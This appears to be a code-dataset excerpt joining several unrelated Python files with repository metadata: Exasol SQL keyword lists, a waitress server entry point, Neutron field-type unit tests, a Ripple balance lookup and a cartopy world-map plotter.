"DEFINED",
"DEFINER",
"DELETE",
"DEREF",
"DERIVED",
"DESC",
"DESCRIBE",
"DESCRIPTOR",
"DETERMINISTIC",
"DISABLE",
"DISABLED",
"DISCONNECT",
"DISPATCH",
"DISTINCT",
"DLURLCOMPLETE",
"DLURLPATH",
"DLURLPATHONLY",
"DLURLSCHEME",
"DLURLSERVER",
"DLVALUE",
"DO",
"DOMAIN",
"DOUBLE",
"DROP",
"DYNAMIC",
"DYNAMIC_FUNCTION",
"DYNAMIC_FUNCTION_CODE",
"EACH",
"ELSE",
"ELSEIF",
"ELSIF",
"EMITS",
"ENABLE",
"ENABLED",
"END",
"END-EXEC",
"ENDIF",
"ENFORCE",
"EQUALS",
"ERRORS",
"ESCAPE",
"EXCEPT",
"EXCEPTION",
"EXEC",
"EXECUTE",
"EXISTS",
"EXIT",
"EXPORT",
"EXTERNAL",
"EXTRACT",
"FALSE",
"FBV",
"FETCH",
"FILE",
"FINAL",
"FIRST",
"FLOAT",
"FOLLOWING",
"FOR",
"FORALL",
"FORCE",
"FORMAT",
"FOUND",
"FREE",
"FROM",
"FS",
"FULL",
"FUNCTION",
"GENERAL",
"GENERATED",
"GEOMETRY",
"GET",
"GLOBAL",
"GO",
"GOTO",
"GRANT",
"GRANTED",
"GROUP",
"GROUPING",
"GROUPS",
"GROUP_CONCAT",
"HASHTYPE",
"HASHTYPE_FORMAT",
"HAVING",
"HIGH",
"HOLD",
"HOUR",
"IDENTITY",
"IF",
"IFNULL",
"IMMEDIATE",
"IMPERSONATE",
"IMPLEMENTATION",
"IMPORT",
"IN",
"INDEX",
"INDICATOR",
"INNER",
"INOUT",
"INPUT",
"INSENSITIVE",
"INSERT",
"INSTANCE",
"INSTANTIABLE",
"INT",
"INTEGER",
"INTEGRITY",
"INTERSECT",
"INTERVAL",
"INTO",
"INVERSE",
"INVOKER",
"IS",
"ITERATE",
"JOIN",
"KEY_MEMBER",
"KEY_TYPE",
"LARGE",
"LAST",
"LATERAL",
"LDAP",
"LEADING",
"LEAVE",
"LEFT",
"LEVEL",
"LIKE",
"LIMIT",
"LISTAGG",
"LOCAL",
"LOCALTIME",
"LOCALTIMESTAMP",
"LOCATOR",
"LOG",
"LONGVARCHAR",
"LOOP",
"LOW",
"MAP",
"MATCH",
"MATCHED",
"MERGE",
"METHOD",
"MINUS",
"MINUTE",
"MOD",
"MODIFIES",
"MODIFY",
"MODULE",
"MONTH",
"NAMES",
"NATIONAL",
"NATURAL",
"NCHAR",
"NCLOB",
"NEW",
"NEXT",
"NLS_DATE_FORMAT",
"NLS_DATE_LANGUAGE",
"NLS_FIRST_DAY_OF_WEEK",
"NLS_NUMERIC_CHARACTERS",
"NLS_TIMESTAMP_FORMAT",
"NO",
"NOCYCLE",
"NOLOGGING",
"NONE",
"NOT",
"NULL",
"NULLIF",
"NUMBER",
"NUMERIC",
"NVARCHAR",
"NVARCHAR2",
"OBJECT",
"OF",
"OFF",
"OLD",
"ON",
"ONLY",
"OPEN",
"OPTION",
"OPTIONS",
"OR",
"ORDER",
"ORDERING",
"ORDINALITY",
"OTHERS",
"OUT",
"OUTER",
"OUTPUT",
"OVER",
"OVERLAPS",
"OVERLAY",
"OVERRIDING",
"PAD",
"PARALLEL_ENABLE",
"PARAMETER",
"PARAMETER_SPECIFIC_CATALOG",
"PARAMETER_SPECIFIC_NAME",
"PARAMETER_SPECIFIC_SCHEMA",
"PARTIAL",
"PATH",
"PERMISSION",
"PLACING",
"PLUS",
"POSITION",
"PRECEDING",
"PREFERRING",
"PREPARE",
"PRESERVE",
"PRIOR",
"PRIVILEGES",
"PROCEDURE",
"PROFILE",
"QUALIFY",
"RANDOM",
"RANGE",
"READ",
"READS",
"REAL",
"RECOVERY",
"RECURSIVE",
"REF",
"REFERENCES",
"REFERENCING",
"REFRESH",
"REGEXP_LIKE",
"RELATIVE",
"RELEASE",
"RENAME",
"REPEAT",
"REPLACE",
"RESTORE",
"RESTRICT",
"RESULT",
"RETURN",
"RETURNED_LENGTH",
"RETURNED_OCTET_LENGTH",
"RETURNS",
"REVOKE",
"RIGHT",
"ROLLBACK",
"ROLLUP",
"ROUTINE",
"ROW",
"ROWS",
"ROWTYPE",
"SAVEPOINT",
"SCHEMA",
"SCOPE",
"SCOPE_USER",
"SCRIPT",
"SCROLL",
"SEARCH",
"SECOND",
"SECTION",
"SECURITY",
"SELECT",
"SELECTIVE",
"SELF",
"SENSITIVE",
"SEPARATOR",
"SEQUENCE",
"SESSION",
"SESSIONTIMEZONE",
"SESSION_USER",
"SET",
"SETS",
"SHORTINT",
"SIMILAR",
"SMALLINT",
"SOME",
"SOURCE",
"SPACE",
"SPECIFIC",
"SPECIFICTYPE",
"SQL",
"SQLEXCEPTION",
"SQLSTATE",
"SQLWARNING",
"SQL_BIGINT",
"SQL_BIT",
"SQL_CHAR",
"SQL_DATE",
"SQL_DECIMAL",
"SQL_DOUBLE",
"SQL_FLOAT",
"SQL_INTEGER",
"SQL_LONGVARCHAR",
"SQL_NUMERIC",
"SQL_PREPROCESSOR_SCRIPT",
"SQL_REAL",
"SQL_SMALLINT",
"SQL_TIMESTAMP",
"SQL_TINYINT",
"SQL_TYPE_DATE",
"SQL_TYPE_TIMESTAMP",
"SQL_VARCHAR",
"START",
"STATE",
"STATEMENT",
"STATIC",
"STRUCTURE",
"STYLE",
"SUBSTRING",
"SUBTYPE",
"SYSDATE",
"SYSTEM",
"SYSTEM_USER",
"SYSTIMESTAMP",
"TABLE",
"TEMPORARY",
"TEXT",
"THEN",
"TIME",
"TIMESTAMP",
"TIMEZONE_HOUR",
"TIMEZONE_MINUTE",
"TINYINT",
"TO",
"TRAILING",
"TRANSACTION",
"TRANSFORM",
"TRANSFORMS",
"TRANSLATION",
"TREAT",
"TRIGGER",
"TRIM",
"TRUE",
"TRUNCATE",
"UNDER",
"UNION",
"UNIQUE",
"UNKNOWN",
"UNLINK",
"UNNEST",
"UNTIL",
"UPDATE",
"USAGE",
"USER",
"USING",
"VALUE",
"VALUES",
"VARCHAR",
"VARCHAR2",
"VARRAY",
"VERIFY",
"VIEW",
"WHEN",
"WHENEVER",
"WHERE",
"WHILE",
"WINDOW",
"WITH",
"WITHIN",
"WITHOUT",
"WORK",
"YEAR",
"YES",
"ZONE",
]
UNRESERVED_KEYWORDS = [
"ABS",
"ACCESS",
"ACOS",
"ADAPTER",
"ADD_DAYS",
"ADD_HOURS",
"ADD_MINUTES",
"ADD_MONTHS",
"ADD_SECONDS",
"ADD_WEEKS",
"ADD_YEARS",
"ADMIN",
"ALIGN",
"ALWAYS",
"ANALYZE",
"ANSI",
"APPROXIMATE_COUNT_DISTINCT",
"ASCII",
"ASIN",
"ASSIGNMENT",
"ASYMMETRIC",
"ATAN",
"ATAN2",
"ATOMIC",
"ATTEMPTS",
"AUDIT",
"AUTHENTICATED",
"AUTO",
"AVG",
"BACKUP",
"BERNOULLI",
"BIT_AND",
"BIT_CHECK",
"BIT_LENGTH",
"BIT_LROTATE",
"BIT_LSHIFT",
"BIT_NOT",
"BIT_OR",
"BIT_RROTATE",
"BIT_RSHIFT",
"BIT_SET",
"BIT_TO_NUM",
"BIT_XOR",
"BREADTH",
"CEIL",
"CEILING",
"CHANGE",
"CHARACTERS",
"CHARACTER_LENGTH",
"CHR",
"CLEAR",
"COBOL",
"COLOGNE_PHONETIC",
"COMMENT",
"COMMENTS",
"COMMITTED",
"CONCAT",
"CONNECT",
"CONVERT_TZ",
"CORR",
"COS",
"COSH",
"COT",
"COUNT",
"COVAR_POP",
"COVAR_SAMP",
"CREATED",
"CROSS",
"CURDATE",
"DATABASE",
"DATE_TRUNC",
"DAYS_BETWEEN",
"DEBUG",
"DECODE",
"DEFAULTS",
"DEFAULT_CONSUMER_GROUP",
"DEGREES",
"DELIMIT",
"DELIMITER",
"DENSE_RANK",
"DEPTH",
"DIAGNOSTICS",
"DICTIONARY",
"DISTRIBUTE",
"DISTRIBUTION",
"DIV",
"DOWN",
"DUMP",
"EDIT_DISTANCE",
"EMPTY",
"ENCODING",
"ERROR",
"ESTIMATE",
"EVALUATE",
"EVERY",
"EXA",
"EXCLUDE",
"EXCLUDING",
"EXP",
"EXPERIMENTAL",
"EXPIRE",
"EXPLAIN",
"EXPRESSION",
"FAILED",
"FILES",
"FIRST_VALUE",
"FLOOR",
"FLUSH",
"FOREIGN",
"FORTRAN",
"FROM_POSIX_TIME",
"GREATEST",
"GROUPING_ID",
"HANDLER",
"HAS",
"HASH",
"HASHTYPE_MD5",
"HASHTYPE_SHA",
"HASHTYPE_SHA1",
"HASHTYPE_SHA256",
"HASHTYPE_SHA512",
"HASHTYPE_TIGER",
"HASH_MD5",
"HASH_SHA",
"HASH_SHA1",
"HASH_SHA256",
"HASH_SHA512",
"HASH_TIGER",
"HIERARCHY",
"HOURS_BETWEEN",
"IDENTIFIED",
"IGNORE",
"IMPERSONATION",
"INCLUDING",
"INITCAP",
"INITIALLY",
"INSTR",
"INVALID",
"IPROC",
"ISOLATION",
"IS_BOOLEAN",
"IS_DATE",
"IS_DSINTERVAL",
"IS_NUMBER",
"IS_TIMESTAMP",
"IS_YMINTERVAL",
"JAVA",
"JAVASCRIPT",
"JSON",
"JSON_EXTRACT",
"JSON_VALUE",
"KEEP",
"KERBEROS",
"KEY",
"KEYS",
"KILL",
"LAG",
"LANGUAGE",
"LAST_VALUE",
"LCASE",
"LEAD",
"LEAST",
"LENGTH",
"LINK",
"LN",
"LOCATE",
"LOCK",
"LOG10",
"LOG2",
"LOGIN",
"LOGS",
"LONG",
"LOWER",
"LPAD",
"LTRIM",
"LUA",
"MANAGE",
"MAX",
"MAXIMAL",
"MEDIAN",
"MESSAGE",
"MID",
"MIN",
"MINUTES_BETWEEN",
"MONTHS_BETWEEN",
"MUL",
"MULTIPLE",
"MUMPS",
"NEVER",
"NICE",
"NORMALIZED",
"NOTICE",
"NOW",
"NPROC",
"NULLIFZERO",
"NULLS",
"NUMTODSINTERVAL",
"NUMTOYMINTERVAL",
"NVL",
"NVL2",
"OBJECTS",
"OCTETS",
"OCTET_LENGTH",
"OFFSET",
"OPTIMIZE",
"OPTIMIZER",
"ORA",
"OVERFLOW",
"OWNER",
"PADDING",
"PARTITION",
"PASCAL",
"PASSWORD",
"PASSWORD_EXPIRY_POLICY",
"PASSWORD_SECURITY_POLICY",
"PERCENTILE_CONT",
"PERCENTILE_DISC",
"PI",
"PLI",
"POSIX_TIME",
"POWER",
"PRECISION",
"PRELOAD",
"PRIMARY",
"PRINCIPAL",
"PRIVILEGE",
"PYTHON",
"QUERY_CACHE",
"QUERY_TIMEOUT",
"QUIET",
"R",
"RADIANS",
"RAND",
"RANK",
"RATIO_TO_REPORT",
"RAW_SIZE_LIMIT",
"RECOMPRESS",
"RECORD",
"REGEXP_INSTR",
"REGEXP_REPLACE",
"REGEXP_SUBSTR",
"REGR_AVGX",
"REGR_AVGY",
"REGR_COUNT",
"REGR_INTERCEPT",
"REGR_R2",
"REGR_SLOPE",
"REGR_SXX",
"REGR_SXY",
"REGR_SYY",
"REJECT",
"REORGANIZE",
"REPEATABLE",
"RESET",
"RESPECT",
"RETURNING",
"REVERSE",
"ROLE",
"ROLES",
"ROUND",
"ROWID",
"ROW_NUMBER",
"RPAD",
"RTRIM",
"SCALAR",
"SCHEMAS",
"SCHEME",
"SCRIPT_LANGUAGES",
"SCRIPT_OUTPUT_ADDRESS",
"SECONDS_BETWEEN",
"SECURE",
"SERIALIZABLE",
"SESSION_PARAMETER",
"SESSION_TEMP_DB_RAM_LIMIT",
"SHUT",
"SIGN",
"SIMPLE",
"SIN",
"SINH",
"SIZE",
"SKIP",
"SOUNDEX",
"SQRT",
"STATISTICS",
"STDDEV",
"STDDEV_POP",
"STDDEV_SAMP",
"ST_AREA",
"ST_BOUNDARY",
"ST_BUFFER",
"ST_CENTROID",
"ST_CONTAINS",
"ST_CONVEXHULL",
"ST_CROSSES",
"ST_DIFFERENCE",
"ST_DIMENSION",
"ST_DISJOINT",
"ST_DISTANCE",
"ST_ENDPOINT",
"ST_ENVELOPE",
"ST_EQUALS",
"ST_EXTERIORRING",
"ST_FORCE2D",
"ST_GEOMETRYN",
"ST_GEOMETRYTYPE",
"ST_INTERIORRINGN",
"ST_INTERSECTION",
"ST_INTERSECTS",
"ST_ISCLOSED",
"ST_ISEMPTY",
"ST_ISRING",
"ST_ISSIMPLE",
"ST_LENGTH",
"ST_MAX_DECIMAL_DIGITS",
"ST_NUMGEOMETRIES",
"ST_NUMINTERIORRINGS",
"ST_NUMPOINTS",
"ST_OVERLAPS",
"ST_POINTN",
"ST_SETSRID",
"ST_STARTPOINT",
"ST_SYMDIFFERENCE",
"ST_TOUCHES",
"ST_TRANSFORM",
"ST_UNION",
"ST_WITHIN",
"ST_X",
"ST_Y",
"SUBSTR",
"SUM",
"SYMMETRIC",
"SYS_CONNECT_BY_PATH",
"SYS_GUID",
"TABLES",
"TABLESAMPLE",
"TAN",
"TANH",
"TASKS",
"TEMP_DB_RAM_LIMIT",
"TIES",
"TIMESTAMP_ARITHMETIC_BEHAVIOR",
"TIME_ZONE",
"TIME_ZONE_BEHAVIOR",
"TO_CHAR",
"TO_DATE",
"TO_DSINTERVAL",
"TO_NUMBER",
"TO_TIMESTAMP",
"TO_YMINTERVAL",
"TRACE",
"TRANSLATE",
"TRUNC",
"TYPE",
"UCASE",
"UNBOUNDED",
"UNCOMMITTED",
"UNDO",
"UNICODE",
"UNICODECHR",
"UNLIMITED",
"UPPER",
"USE",
"USER_TEMP_DB_RAM_LIMIT",
"UTF8",
"VALUE2PROC",
"VARIANCE",
"VARYING",
"VAR_POP",
"VAR_SAMP",
"VIRTUAL",
"WEEK",
"WRITE",
"YEARS_BETWEEN",
"ZEROIFNULL",
# Additional unreserved keywords not defined in EXA_SQL_KEYWORDS
"JDBC",
"DRIVER",
"CONSUMER",
]
BARE_FUNCTIONS = [
"CURRENT_TIMESTAMP",
"SYSTIMESTAMP",
"NOW",
"LOCALTIMESTAMP",
"CURDATE",
"CURRENT_DATE",
"SYSDATE",
"CURRENT_USER",
"USER",
"CURRENT_SESSION",
"SESSIONTIMEZONE",
"DBTIMEZONE",
"CURRENT_SCHEMA",
"CURRENT_STATEMENT",
"ROWID",
"ROWNUM",
"LEVEL",
"CONNECT_BY_ISLEAF",
"CONNECT_BY_ROOT",
"CONNECT_BY_ISCYCLE",
]
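# A minimal sketch of how keyword lists like these are typically consumed:
# a case-insensitive membership test against the reserved list above.
def _is_reserved(word):
    return word.upper() in RESERVED_KEYWORDS
assert _is_reserved("select") and not _is_reserved("zeroifnull")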
| 15.970252
| 68
| 0.502221
|
c7ed458a812f289003ac710bd37482747e3b2ae9
| 1,001
|
py
|
Python
|
main.py
|
guard-project/lcp
|
1e003bde5323325aaab9b72912481661808fc33b
|
[
"MIT"
] | 1
|
2020-05-14T00:32:44.000Z
|
2020-05-14T00:32:44.000Z
|
main.py
|
guard-project/lcp
|
1e003bde5323325aaab9b72912481661808fc33b
|
[
"MIT"
] | 6
|
2020-10-30T12:08:16.000Z
|
2021-07-04T14:21:51.000Z
|
main.py
|
guard-project/lcp
|
1e003bde5323325aaab9b72912481661808fc33b
|
[
"MIT"
] | 3
|
2020-11-07T12:45:25.000Z
|
2021-02-10T09:59:52.000Z
|
import os
Import_Error = ImportError
path = os.path.abspath(__file__)
dir_path = os.path.dirname(path)
os.chdir(dir_path)
import waitress # noqa: E402
from rich import pretty, traceback # noqa: E402
from rich.console import Console # noqa: E402
from rich.panel import Panel # noqa: E402
pretty.install()
traceback.install(show_locals=False)
from about import project, title, version # noqa: E402
from api import api # noqa: E402
from reader.arg import ArgReader # noqa: E402
from utils.log import Log # noqa: E402
db = ArgReader.read()
if db.version is not None:
print(db.version)
else:
ident = f'{project} - {title} v:{version}'
console = Console()
console.print(Panel.fit(ident))
Log.init(config=db.log_config)
api_instance = api(title=title, version=version)
Log.get('api').success(f'Accept requests at {db.host}:{db.port}')
waitress.serve(api_instance, host=db.host, port=db.port,
expose_tracebacks=False, ident=ident, _quiet=True)
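# A minimal sketch of the waitress serving pattern used above, with a trivial
# WSGI callable standing in for the project's `api` factory; host and port are
# illustrative and the call is left commented out because serve() blocks.
def _hello_app(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'hello']
# waitress.serve(_hello_app, host='127.0.0.1', port=8080)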
| 29.441176
| 69
| 0.712288
|
44d43b16fd6b9b02b6cc3ebc93a719bad47192f1
| 9,670
|
py
|
Python
|
neutron/tests/unit/objects/test_common_types.py
|
brandonlogan/neutron
|
57364544aa8b0e7cd9d73550f287bcad574ba08c
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/objects/test_common_types.py
|
brandonlogan/neutron
|
57364544aa8b0e7cd9d73550f287bcad574ba08c
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/objects/test_common_types.py
|
brandonlogan/neutron
|
57364544aa8b0e7cd9d73550f287bcad574ba08c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 OpenStack Foundation
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import itertools
import random
from neutron_lib import constants as const
from neutron.common import constants
from neutron.extensions import dns as dns_ext
from neutron.objects import common_types
from neutron.tests import base as test_base
from neutron.tests import tools
class TestField(object):
def test_coerce_good_values(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual(out_val, self.field.coerce('obj', 'attr', in_val))
def test_coerce_bad_values(self):
for in_val in self.coerce_bad_values:
self.assertRaises((TypeError, ValueError),
self.field.coerce, 'obj', 'attr', in_val)
def test_to_primitive(self):
for in_val, prim_val in self.to_primitive_values:
self.assertEqual(prim_val, self.field.to_primitive('obj', 'attr',
in_val))
def test_from_primitive(self):
class ObjectLikeThing(object):
_context = 'context'
for prim_val, out_val in self.from_primitive_values:
self.assertEqual(out_val, self.field.from_primitive(
ObjectLikeThing, 'attr', prim_val))
@abc.abstractmethod
def test_stringify(self):
'''This test should validate stringify() format for new field types.'''
class IPV6ModeEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IPV6ModeEnumFieldTest, self).setUp()
self.field = common_types.IPV6ModeEnumField()
self.coerce_good_values = [(mode, mode)
for mode in const.IPV6_MODES]
self.coerce_bad_values = ['6', 4, 'type', 'slaacc']
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
class DscpMarkFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(DscpMarkFieldTest, self).setUp()
self.field = common_types.DscpMarkField()
self.coerce_good_values = [(val, val)
for val in constants.VALID_DSCP_MARKS]
self.coerce_bad_values = ['6', 'str', [], {}, object()]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("%s" % in_val, self.field.stringify(in_val))
class IPNetworkPrefixLenFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IPNetworkPrefixLenFieldTest, self).setUp()
self.field = common_types.IPNetworkPrefixLenField()
self.coerce_good_values = [(x, x) for x in (0, 32, 128, 42)]
self.coerce_bad_values = ['len', '1', 129, -1]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("%s" % in_val, self.field.stringify(in_val))
class MACAddressFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(MACAddressFieldTest, self).setUp()
self.field = common_types.MACAddressField()
mac1 = tools.get_random_EUI()
mac2 = tools.get_random_EUI()
self.coerce_good_values = [(mac1, mac1), (mac2, mac2)]
self.coerce_bad_values = [
'XXXX', 'ypp', 'g3:vvv',
            # the field type is strict and does not allow passing strings, even
# if they represent a valid MAC address
tools.get_random_mac(),
]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual('%s' % in_val, self.field.stringify(in_val))
class IPNetworkFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IPNetworkFieldTest, self).setUp()
self.field = common_types.IPNetworkField()
addrs = [
tools.get_random_ip_network(version=ip_version)
for ip_version in constants.IP_ALLOWED_VERSIONS
]
self.coerce_good_values = [(addr, addr) for addr in addrs]
self.coerce_bad_values = [
'ypp', 'g3:vvv',
            # the field type is strict and does not allow passing strings, even
# if they represent a valid IP network
'10.0.0.0/24',
]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual('%s' % in_val, self.field.stringify(in_val))
class IPVersionEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IPVersionEnumFieldTest, self).setUp()
self.field = common_types.IPVersionEnumField()
self.coerce_good_values = [(val, val)
for val in constants.IP_ALLOWED_VERSIONS]
self.coerce_bad_values = [5, 0, -1, 'str']
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("%s" % in_val, self.field.stringify(in_val))
class FlowDirectionEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(FlowDirectionEnumFieldTest, self).setUp()
self.field = common_types.FlowDirectionEnumField()
self.coerce_good_values = [(val, val)
for val in constants.VALID_DIRECTIONS]
self.coerce_bad_values = ['test', '8', 10, []]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
class DomainNameFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(DomainNameFieldTest, self).setUp()
self.field = common_types.DomainNameField()
self.coerce_good_values = [
(val, val)
for val in ('www.google.com', 'hostname', '1abc.com')
]
self.coerce_bad_values = ['x' * (dns_ext.FQDN_MAX_LEN + 1), 10, []]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
class EtherTypeEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(EtherTypeEnumFieldTest, self).setUp()
self.field = common_types.EtherTypeEnumField()
self.coerce_good_values = [(val, val)
for val in constants.VALID_ETHERTYPES]
self.coerce_bad_values = ['IpV4', 8, 'str', 'ipv6']
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
class IpProtocolEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IpProtocolEnumFieldTest, self).setUp()
self.field = common_types.IpProtocolEnumField()
self.coerce_good_values = [
(val, val)
for val in itertools.chain(
const.IP_PROTOCOL_MAP.keys(),
[str(v) for v in const.IP_PROTOCOL_MAP.values()]
)
]
self.coerce_bad_values = ['test', 'Udp', 256]
try:
# pick a random protocol number that is not in the map of supported
# protocols
self.coerce_bad_values.append(
str(
random.choice(
list(
set(range(256)) -
set(const.IP_PROTOCOL_MAP.values())
)
)
)
)
except IndexError:
# stay paranoid and guard against the impossible future when all
# protocols are in the map
pass
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
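# A minimal sketch of how a new field test is meant to slot into the TestField
# mix-in above: fill the four value lists in setUp and implement
# test_stringify. `MyEnumField` is a hypothetical field used for illustration.
# class MyEnumFieldTest(test_base.BaseTestCase, TestField):
#     def setUp(self):
#         super(MyEnumFieldTest, self).setUp()
#         self.field = common_types.MyEnumField()
#         self.coerce_good_values = [(v, v) for v in ('a', 'b')]
#         self.coerce_bad_values = ['c', 1]
#         self.to_primitive_values = self.coerce_good_values
#         self.from_primitive_values = self.coerce_good_values
#     def test_stringify(self):
#         for in_val, _ in self.coerce_good_values:
#             self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))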
| 40.124481
| 79
| 0.646329
|
1a9c2c04bf12b2920e934f51b349c02c17433afc
| 408
|
py
|
Python
|
pyripple/__init__.py
|
nkgilley/python-ripple-api
|
180af1cee5f7a71e6ee0c0e854ff21c77bed5704
|
[
"MIT"
] | 1
|
2017-07-05T08:56:27.000Z
|
2017-07-05T08:56:27.000Z
|
pyripple/__init__.py
|
nkgilley/python-ripple-api
|
180af1cee5f7a71e6ee0c0e854ff21c77bed5704
|
[
"MIT"
] | null | null | null |
pyripple/__init__.py
|
nkgilley/python-ripple-api
|
180af1cee5f7a71e6ee0c0e854ff21c77bed5704
|
[
"MIT"
] | null | null | null |
"""Python API for using ripple.com."""
import requests
BASE_URL = 'https://data.ripple.com/v2/accounts/'
def get_balance(address):
req_url = BASE_URL + address + '/balances'
response = requests.get(req_url)
    if response.status_code == 200:
        payload = response.json()
        if payload.get('result') == 'success':
            return float(payload['balances'][0]['value'])
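# A minimal usage sketch; the address below is a made-up placeholder and
# get_balance returns None when the lookup is not successful.
# balance = get_balance('rEXAMPLEaddress000000000000000000')
# if balance is not None:
#     print('XRP balance:', balance)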
| 34
| 69
| 0.656863
|
98eb7edeb67ec2b893c06821d9b57395d56cfe2c
| 11,192
|
py
|
Python
|
main/ncmagics/worldmap.py
|
RyosukeDTomita/gcmPlot
|
430f8af353daf464b5c5566f1c163d5bef63f584
|
[
"MIT"
] | null | null | null |
main/ncmagics/worldmap.py
|
RyosukeDTomita/gcmPlot
|
430f8af353daf464b5c5566f1c163d5bef63f584
|
[
"MIT"
] | null | null | null |
main/ncmagics/worldmap.py
|
RyosukeDTomita/gcmPlot
|
430f8af353daf464b5c5566f1c163d5bef63f584
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Name: worldmap.py
Plot a world map using cartopy.
Usage: Import this module.
Author: Ryosuke Tomita
Date: 2021/09/08
"""
from typing import Union
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
from matplotlib.colors import ListedColormap, LinearSegmentedColormap
from matplotlib.colors import Normalize
import numpy as np
import cartopy.crs as ccrs
import cartopy.feature as cfea
from cartopy.mpl.ticker import LatitudeFormatter, LongitudeFormatter
class WorldMap:
"""JpMap.
Make map near japan.
"""
def __init__(self, color=False):
"""__init__.
Args:
color:
"""
self.fig = plt.figure(figsize=(36, 24), facecolor='w')
self.ax = self.fig.add_subplot(1, 1, 1,
projection=ccrs.PlateCarree(central_longitude=0.0))
#self.ax = self.fig.add_subplot(1, 1, 1,
# projection=ccrs.NorthPolarStereo(central_longitude=-180))
#self.ax = self.fig.add_subplot(1, 1, 1,
# projection=ccrs.Mollweide(central_longitude=0.0))
self.ax.set_global()
self.ax.coastlines(lw=2.5) # coastline thickness
# using axis lat,lon format
dlon, dlat = 20, 20 # grid line interval.
xticks = np.arange(-180, 180.1, dlon)
yticks = np.arange(-90, 90.1, dlat)
self.ax.set_xticks(xticks, crs=ccrs.PlateCarree())
self.ax.set_yticks(yticks, crs=ccrs.PlateCarree())
latfmt = LatitudeFormatter() # axis = degree
lonfmt = LongitudeFormatter(
zero_direction_label=True) # No NS mark 0 degree
self.ax.xaxis.set_major_formatter(lonfmt)
self.ax.yaxis.set_major_formatter(latfmt)
self.ax.axes.tick_params(labelsize=34)
#self.ax.rcParams['font.size'] = 36
# land color,ocean color
if color:
#self.ax.add_feature(cfea.LAND, color='#98fb98')
#self.ax.add_feature(cfea.OCEAN, color='#87cefa')
self.ax.add_feature(cfea.LAND, color='#f5deb3')
self.ax.add_feature(cfea.OCEAN, color='#afeeee')
# grid setting
grid = self.ax.gridlines(crs=ccrs.PlateCarree(),
draw_labels=False,
linewidth=1,
alpha=0.7,
color='k',)
grid.xlocator = mticker.FixedLocator(xticks)
grid.ylocator = mticker.FixedLocator(yticks)
self.color_list = ['#0000ff', '#00ffff', '#008000', '#adff2f',
'#ffff00', '#ffd700', '#ffa500', '#ff0000',
'#c71585', '#ff1493', '#9400d3', '#00ced1',
'#556b2f', '#deb887', '#daa520', '#8b4513',
'#4b0082', '#ffffff',
]
self.plt_cnt = 0
def plot_data(self, x, y, label: str, line=True):
"""plot_data.
plot location data. plot type is dot.
Args:
x:
y:
label (str): label
            line (bool): if True, connect the points with a line
"""
plt.rcParams['font.size'] = 36 # label font size
if line:
linewidth = 4
linestyle = "solid"
else:
#no line
linewidth = 0
linestyle = None
self.ax.plot(x, y, 'bo',
label=label,
markersize=15,
color=self.color_list[self.plt_cnt],
markeredgewidth=1.6,
markeredgecolor='#000000',
linestyle=linestyle,
linewidth=linewidth,)
self.plt_cnt += 1
def plot_value(self, x, y, z):
"""plot_value.
        plot z values on the world map. x, y are location data.
Args:
x:
y:
z:
"""
for i in range(len(x)):
self.ax.plot(x[i], y[i], marker=str(f'${z[i]:.2f}$'), markersize=90, color='k')
def plot_prmsl_circle(self, x, y, z):
"""plot_value.
plot z value on japan map. x, y are location data.
Args:
x:
y:
z:
"""
for i in range(len(x)):
scale = (1030 - z[i]) // 3
self.ax.plot(x[i], y[i], 'bo',
markersize=15+scale,
color=self.color_list[self.plt_cnt-1],
markeredgewidth=1.6,
markeredgecolor='#000000',)
